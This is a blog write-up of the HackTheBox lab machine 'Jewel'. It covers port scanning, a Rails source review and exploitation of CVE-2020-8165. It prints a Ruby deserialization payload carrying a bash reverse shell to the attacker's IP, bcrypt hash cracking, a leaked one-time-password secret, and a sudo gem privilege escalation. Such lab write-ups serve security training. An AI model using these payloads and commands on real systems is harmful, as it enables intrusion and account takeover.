Home Jewel
Post
Cancel
image alternative text

Jewel

Posted Jan 11, 2021 Updated Mar 7, 2022 3 min read

Jewel is a medium Windows box. It’s main part is Source Code Review.

ENUMERATION

NMAP

Let’s start NMAP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

		Nmap scan report for 10.10.10.211
		Host is up (0.040s latency).
		Not shown: 997 filtered ports
		PORT     STATE SERVICE VERSION
		22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
		| ssh-hostkey: 
		|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
		|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
		|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
		8000/tcp open  http    Apache httpd 2.4.38
		|_http-generator: gitweb/2.20.1 git/2.20.1
		| http-methods: 
		|_  Supported Methods: GET HEAD POST OPTIONS
		| http-open-proxy: Potentially OPEN proxy.
		|_Methods supported:CONNECTION
		|_http-server-header: Apache/2.4.38 (Debian)
		| http-title: 10.10.10.211 Git
		|_Requested resource was http://10.10.10.211:8000/gitweb/
		8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
		| http-methods: 
		|_  Supported Methods: HEAD POST OPTIONS
		|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
		|_http-title: BL0G!
		Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that host’s name is jewel.htb which can be put into the /etc/hosts file. Apart from that there are two Web Services running

WebServer (manual Enum)

On port 8000 there is gitweb running that isn’t vulnerable but it enables us to take a peak into the source code from the webservice running on port 8080.

Checking the bd.sql there are some usernames/passwords from potential users.

Bruteforcing didn’t work against rockyou.txt.

Lets check the Gemfile:

Checking the Versions in Gemfile of Ruby and Rails revealed that Rails are running older vulnerable version (5.2.2.1) and there is PoC already written: https://github.com/masahiro331/CVE-2020-8165

https://groups.google.com/g/rubyonrails-security/c/bv6fW4S0Y1c?pli=1

Checking the source code, raw user input is allowed and will be parsed…

Checking the source code, vulnerable code is present in Update function.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

  32   def update
  33     @user = User.find(params[:id])
  34     if @user && @user == current_user
  35       cache = ActiveSupport::Cache::RedisCacheStore.new(url: "redis://127.0.0.1:6379/0")
  36       cache.delete("username_#{session[:user_id]}")
  37       @current_username = cache.fetch("username_#{session[:user_id]}", raw: true) {user_params[:username]}
  38       if @user.update(user_params)
  39         flash[:success] = "Your account was updated successfully"
  40         redirect_to articles_path
  41       else
  42         cache.delete("username_#{session[:user_id]}")
  43         render 'edit'
  44       end
  45     else
  46       flash[:danger] = "Not authorized"
  47       redirect_to articles_path
  48     end
  49   end

So we can exploit the application running on port 8080. So let’s do that next.

EXPLOITATION

RAILS (Vulnerable to RCE - CVE-2020-8165)

Following exploit will be used: https://github.com/masahiro331/CVE-2020-8165

We need to register, login and change the username. Fetching the request in Burp:

Create payload using ruby - i used version 2.7.2 but i had to run “bundle install” first

1
2
3
4
5
6
7
8
9
10
11
12

$ bundle exec rails console

irb(main):> code = '`bash -c "bash -i >& /dev/tcp/10.10.14.10/9999 0>&1"`'
irb(main):> erb = ERB.allocate
irb(main):> erb.instance_variable_set :@src, code
irb(main):> erb.instance_variable_set :@filename, "1"
irb(main):> erb.instance_variable_set :@lineno, 1
irb(main):> payload=Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
irb(main):>
irb(main):> puts "Payload"
irb(main):> require 'uri'
irb(main):> puts URI.encode_www_form(payload: payload)

Put the payload that was printed by the script into username. (im not sure if it is better to do this in repeater):

If everything has been done correctly reverse shell should pop.

PRIVILEGE ESCALATION

Enumeration

After shell was popped. i fired up linpeas.sh. Long story short -there was interesting file found in /var/backups dump_2020-08-27.sql

Two new hashes for bill and jennifer users will be revealed and one of that can be bruteforced (hashcat mode 3200 (bcrypt)):

Bill’s credentials work with SSH.

Google Authenticator

After logging in with bill .google_authenticator can be found in its home directory.

1
2

bill@jewel:~$ cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4

That string 2UQ… is a secret that is being used to issue one time password.

I installed the authenticator into the chrome and the code was issued (i live in EU but if you live in other places you may need to adjust the time!)

So i was able to run sudo gem open -e “/bin/sh -c /bin/sh” rdoc and get root privileges

HackTheBox, Linux
Linux Ruby Git Abuse Source Code Review Google Authenticator
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents